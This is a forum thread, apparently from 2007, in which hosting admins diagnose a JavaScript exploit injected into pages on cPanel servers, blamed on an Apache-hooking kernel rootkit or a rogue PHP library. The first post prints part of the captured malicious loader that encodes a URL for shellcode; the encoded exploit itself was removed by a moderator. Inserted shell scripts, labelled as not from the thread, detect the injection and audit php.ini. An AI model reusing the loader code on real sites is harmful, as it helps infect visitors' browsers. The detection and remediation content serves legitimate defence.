Results 1 to 25 of 149

11-25-2007, 02:37 PM #1 WHT Addict (Join Date: May 2004, Location: chicago, Posts: 174)
Linux servers having CPANEL - js virus hitting
Hi All,
Earlier this week, our users started reporting that they were getting ActiveX prompts for Microsoft Data Access Component installation. In addition, some of them were getting hit by the RTSP bug (QuickTime) and some were getting the JS/Exploit-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple HTML, PHP, etc.), at times a script tag similar to the one below is inserted right after the <body> tag.
<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>
The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.
I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below).
Solutions tried:
I have checked for the filenames but they do not exist on the server.
1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.
Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}
var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}
var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";
var SB =
<<removed encoded exploit>>
document.write (SB);
Thanks,
Regards
Rushik Shah
Last edited by bear; 11-25-2007 at 09:59 PM. Reason: Pointless to help spread this
CEO - Alakmalak Technologies www.Alakmalak.com
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA
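As an added example (not code from this thread or its posters), a small shell check for the symptom this post describes: it scans an HTML body for a <script> tag with a five-letter random .js name sitting right after <body>. The function names and the two sample pages are assumptions made here.

```shell
#!/bin/sh
# Added example, not from the thread: spot the injected <script> tag described in
# post #1 (a five-letter random .js name inserted right after <body>) in an HTML
# body captured from the server. Names and samples are this example's own.

# Constructed samples, not real captures: one injected page, one clean page.
INJECTED_SAMPLE="<html><head><title>t</title></head>
<BODY><script language='JavaScript' type='text/javascript' src='shfuy.js'></script>
<p>hello</p></body></html>"
CLEAN_SAMPLE="<html><body><p>hello</p><script src=\"/js/app.js\"></script></body></html>"

# <body ...> followed only by whitespace and a <script> whose src is exactly
# five lowercase letters plus .js, with no path component (the thread's pattern).
BODY_SCRIPT_RE="<body[^>]*>[[:space:]]*<script[^>]*src=[\"'][a-z]{5}\\.js[\"']"

# Read HTML on stdin, print each matching src (one per line), nothing if clean.
find_injected_js() {
    tr -d '\r\n' | tr '[:upper:]' '[:lower:]' |
        grep -oE "$BODY_SCRIPT_RE" |
        sed -E "s/.*src=[\"']([a-z]{5}\\.js).*/\\1/" | sort -u
}

# Exit status 0 when stdin looks injected, 1 otherwise.
page_is_injected() {
    [ -n "$(find_injected_js)" ]
}

# One-line report for a page body on stdin; $1 is a label for the output.
report_page() {
    hits=$(find_injected_js)
    if [ -n "$hits" ]; then
        echo "$1: INJECTED ($(echo "$hits" | paste -sd, -))"
    else
        echo "$1: clean"
    fi
}

printf '%s' "$INJECTED_SAMPLE" | report_page "sample-injected"  # prints "sample-injected: INJECTED (shfuy.js)"
printf '%s' "$CLEAN_SAMPLE" | report_page "sample-clean"        # prints "sample-clean: clean"
```

On a live server the same functions take a fetched body, e.g. `curl -s http://your-host/ | page_is_injected`, which matters here because the post reports the tag only shows up once per client IP.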

11-25-2007, 02:49 PM #2 Web Hosting Master (Join Date: Apr 2001, Location: Paradise, Posts: 12,052)
Does anybody have the FTP information of all the accounts having this problem? It may be possible that a compromised computer was infecting those sites without even knowing it.
█ Shared Web Hosting - Reseller Hosting - Semi-Dedicated Servers - SolusVM/XEN VPS
█ LiteSpeed Powered - R1Soft Continuous Data Protection - 24/7 Chat/Email/Helpdesk Support
█ Cpanel/WHM - Softaculous - R1soft Backup - Litespeed - Cloudlinux -Site Builder- SSH support - Account Migration
█ DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore

11-25-2007, 02:51 PM #3 Web Hosting Master (Join Date: Oct 2003, Posts: 9,264)
It's more than likely it was just a defacement of the specific account. Doubtful that it's an end user's system being exploited and then FTPing up the data; far too much effort.

11-25-2007, 03:02 PM #4 WHT Addict (Join Date: May 2004, Location: chicago, Posts: 174)
Hi Jedito / David
Thanks for your quick reply. Actually, I already did this check.
I changed FTP passwords, but it still got affected again after 3-4 days.
The fact of the matter is that almost all websites on the server are affected, mostly the index.html and PHP files.
Any clue?
Thanks!
Regards
Rushik Shah

11-25-2007, 03:09 PM #5 Web Hosting Master (Join Date: Apr 2001, Location: Paradise, Posts: 12,052)
There's a trojan which does this automatically: the trojan infects the computer and picks up the FTP book of any FTP program installed on the computer, then sends it to the "hacker", who later uses it to upload the infected data. This happened to one of my resellers a while ago.
To the OP: check the FTP logs of the affected account for which files were uploaded, and check whether the IP uploading those files mismatches in all of them.

11-25-2007, 04:21 PM #6 Web Hosting Evangelist (Join Date: Jul 2005, Location: Belgium, Posts: 507)
Hi,
Which platforms does this trojan infect? Do you know its name?
Thanks,
sashk
kept alive by vertaalbureau

11-25-2007, 07:21 PM #7 Junior Guru Wannabe (Join Date: Nov 2007, Posts: 51)
Is there a way to stop this from happening on a cpanel server?

11-25-2007, 08:42 PM #8 Web Hosting Master (Join Date: Apr 2005, Posts: 1,767)
Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:
find / -name '*.js' -print0 | xargs -0 grep -l unescape

11-25-2007, 08:46 PM #9 the ground beneath my feet (Join Date: Feb 2006, Posts: 1,107)
The code is here: <<snipped>>
Last edited by anon-e-mouse; 11-25-2007 at 09:04 PM.
semi-retired

11-25-2007, 08:57 PM #10 Web Hosting Master (Join Date: Apr 2005, Posts: 1,767)
Also, check xferlog and see who uploaded it.

11-25-2007, 09:04 PM #11 Web Hosting Master (Join Date: May 2003, Location: Kirkland, WA, Posts: 4,448)
To clarify, there is absolutely no evidence provided that this is at all isolated to cPanel even if it is in fact an issue.

11-25-2007, 09:05 PM #12 Web Hosting Master (Join Date: Apr 2005, Posts: 1,767)
Don't paste code like that on a public forum.

11-25-2007, 09:43 PM #13 the ground beneath my feet (Join Date: Feb 2006, Posts: 1,107)

11-25-2007, 10:00 PM #14
11-28-2007, 06:58 AM #15Aspiring Evangelist
- Join Date
- Sep 2003
- Location
- Europe
- Posts
- 398
Hello Rushik,
I can second your findings. The exploit appears all the time on different pages (the page indicated by KIS keeps changing, usually HTML) and it doesn't appear twice for the same IP and this seems to me to be related to IE only. Have you discovered anything new?
Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:
find / -name '*.js' -print0 | xargs -0 grep -l unescape
Any clue anyone?
Thanks and regards!
Last edited by bear; 11-28-2007 at 07:27 AM.

11-29-2007, 01:34 AM #16 WHT Addict (Join Date: May 2004, Location: chicago, Posts: 174)
Hi Andy,
I am still trying to find out what the best way to get it out would be. I tried consulting many data center companies, but the only solution they can think of is an OS reload.
Let me know if you find anything.
Any help from anybody would be greatly appreciated.
Thanks!
Regards
Rushik

11-29-2007, 10:34 AM #17 Keep rockin' in the free world (Join Date: May 2002, Location: Kingston, Ontario, Posts: 1,588)
You need to scan all your user accounts for malicious files now, not just .js. An OS reload isn't needed in this case unless you've been rooted, which is uncommon in this type of attack.

11-30-2007, 03:17 AM #18 Aspiring Evangelist (Join Date: Sep 2003, Location: Europe, Posts: 398)
Hello Ramprage,
This has absolutely nothing to do with the site itself. One simple test confirms it. Create a new account in WHM, upload an HTML file that is not even HTML (just plain text), change your IP, and when you try to visit the "page", it already contains a .js inclusion with a 5-random-character name that can be seen only in the browser by viewing the source, but not on the server. It gets added somehow on the fly...
Regards!

11-30-2007, 03:29 AM #19 Engineer (Join Date: Jan 2005, Location: Scotland, UK, Posts: 2,681)
I know what exploit this is; it injects at the kernel level. You can find it by writing a module for the kernel that lists all loaded modules (it will be hidden from /proc/modules). You can also verify it's the same thing by trying to create a file/directory that starts with a number: you should get something to the effect of "No such file/directory" (this is part of the rootkit). Otherwise you can go for the quick fix, which is to get a working grsec version that protects writing to /dev/kmem, but good luck compiling because of the number at the start of the files/directories. There are quite a few variants of this; some even stop /boot/map from being written, so you'll struggle to even get a new kernel without a rescue CD.
Server Management - AdminGeekZ.com
Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

01-04-2008, 04:00 PM #20 WHT Addict (Join Date: May 2004, Location: chicago, Posts: 174)
Hi All,
I wanted to see if anybody got some more insight on the same to resolve the issue.
Thanks!
Regards
Rushik

01-04-2008, 05:58 PM #21 Web Hosting Master (Join Date: Apr 2002, Location: Auckland - New Zealand, Posts: 1,575)
You don't have enable_dl = 1 (or yes) in your php.ini, do you?
If you do, disable it!
The old PHP hack loading a nasty library can do this; search for flame.so (Google, WHT, etc.).

01-05-2008, 12:37 AM #22 Junior Guru Wannabe (Join Date: Feb 2003, Location: Portland, OR, Posts: 81)
dotable steve - thank you for the info on flame.so, google turned up a great page about it.
However, although one of my machines has all of the symptoms, I'm not able to find a flame.so or flame.anything on my server. Do you know of another file name the attackers may be using now?

01-05-2008, 12:49 AM #23 Web Hosting Master (Join Date: Apr 2002, Location: Auckland - New Zealand, Posts: 1,575)
First off, just disable enable_dl in your php.ini and restart Apache.
Does that solve the problem? Is the injection now gone?
After that, try locate *.so or find; anything in /home with .so (but it could be called anything) deserves a closer inspection.
Also, turning on error logging for PHP after disabling enable_dl might turn up where the scripts are, if they exist, as you'll see attempts to load a dl in the error_log. As an example:
error_log = /var/log/php_error_log
Last edited by StevenG; 01-05-2008 at 12:56 AM.
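Added example, not StevenG's own code: a shell audit of the two php.ini settings this post and #21 discuss (enable_dl left on, error_log unset), with the weak setting beside the corrected one, plus the .so search under a web root. The function names, sample ini text and sample paths are assumptions made here.

```shell
#!/bin/sh
# Added example, not from the thread: audit php.ini for enable_dl and error_log
# and list shared objects under a directory tree (the dl()-loaded-library case
# that flame.so belongs to). Names and sample text are this example's own.

# Constructed php.ini fragments: the weak setting and the corrected one.
WEAK_INI="; constructed sample, weak
enable_dl = On
display_errors = Off"
FIXED_INI="; constructed sample, corrected
enable_dl = Off
log_errors = On
error_log = /var/log/php_error_log"

# Read a php.ini on stdin; print one finding per line, nothing if both are sane.
audit_php_ini() {
    ini=$(cat)
    # last effective enable_dl value, with trailing ';' comment, quotes and spaces stripped
    dl=$(printf '%s\n' "$ini" | grep -iE '^[[:space:]]*enable_dl[[:space:]]*=' | tail -n 1 |
         sed -E 's/^[^=]*=[[:space:]]*//; s/[[:space:]]*;.*$//' | tr -d '" ' | tr '[:upper:]' '[:lower:]')
    case "$dl" in
        1|on|yes|true) echo "enable_dl is enabled ($dl): set enable_dl = Off and restart Apache" ;;
    esac
    # error_log must be present with a non-empty value, or dl() attempts go unlogged
    printf '%s\n' "$ini" | grep -qiE '^[[:space:]]*error_log[[:space:]]*=[[:space:]]*[^[:space:];]' ||
        echo "error_log is not set: failed dl() attempts will not be logged"
}

# List files named like shared objects under the tree $1 (e.g. /home), sorted.
find_shared_objects() {
    find "$1" -type f \( -name '*.so' -o -name '*.so.*' \) 2>/dev/null | sort
}

printf '%s\n' "$WEAK_INI" | audit_php_ini    # two findings
printf '%s\n' "$FIXED_INI" | audit_php_ini   # no output
```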

01-05-2008, 12:56 AM #24 Junior Guru Wannabe (Join Date: Feb 2003, Location: Portland, OR, Posts: 81)

01-05-2008, 07:28 AM #25 Engineer (Join Date: Jan 2005, Location: Scotland, UK, Posts: 2,681)
The post I made above does actually explain pretty much the most common symptoms (it's not flame.so for the thread starter). More specifically, you'll notice it by monitoring your packet logs for 5-letter javascript files being output in HTML; these are 5 random digits each time a page loads and are only shown once per IP. This is done by the exploit hooking into Apache by writing to /dev/kmem.
The simplest fix is to just go for a grsec kernel that protects /dev/kmem, but you'll likely need to boot into a rescue CD and compile that way, because from what I've seen so far it will either invoke a panic when you are compiling or, like I said above, it prevents directories with numbers from being created.
Not seen flame.so in a while myself personally, but k2host, you would need to explain the symptoms, simply because there are so many variants and so many different things it could be.
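Added example, not from any of this thread's posters: shell checks for the symptoms described in posts #19 and #25 (names starting with a digit being refused, modules hidden from /proc/modules, and whether /dev/kmem is present at all). Function names and the probe directory are assumptions; this is a coarse substitute for the kernel module post #19 suggests, not a full detection.

```shell
#!/bin/sh
# Added example, not from the thread: quick checks for the rootkit symptoms that
# posts #19 and #25 describe, without writing the kernel module post #19 suggests.
# Function names and the probe directory are this example's own assumptions.

# Try to create a directory whose name starts with a digit. Prints "ok" if the
# kernel allows it, "blocked" if the attempt fails (the symptom in post #19).
# $1: directory to probe in; a fresh mktemp directory is used when omitted.
numeric_name_check() {
    probe_dir="${1:-$(mktemp -d)}"
    if mkdir "$probe_dir/1probe" 2>/dev/null; then
        rmdir "$probe_dir/1probe"
        result=ok
    else
        result=blocked
    fi
    [ -n "$1" ] || rmdir "$probe_dir" 2>/dev/null
    echo "$result"
}

# Print loaded modules that have a sysfs entry but no line in /proc/modules.
# Built-in code also appears under /sys/module, so only entries with an
# initstate file (actually loaded modules) are compared. Prints nothing when
# clean or when procfs/sysfs are unavailable.
hidden_modules() {
    [ -r /proc/modules ] && [ -d /sys/module ] || return 0
    for d in /sys/module/*/; do
        [ -f "${d}initstate" ] || continue
        name=$(basename "$d")
        grep -q "^$name " /proc/modules || echo "$name"
    done
    return 0
}

# "present" if /dev/kmem exists (the write path the hook in post #25 needs),
# "absent" otherwise. Modern kernels ship without it.
kmem_exposed() {
    if [ -e /dev/kmem ]; then echo present; else echo absent; fi
}

echo "numeric names: $(numeric_name_check)"
echo "hidden modules: $(hidden_modules | paste -sd, -)"
echo "/dev/kmem: $(kmem_exposed)"
```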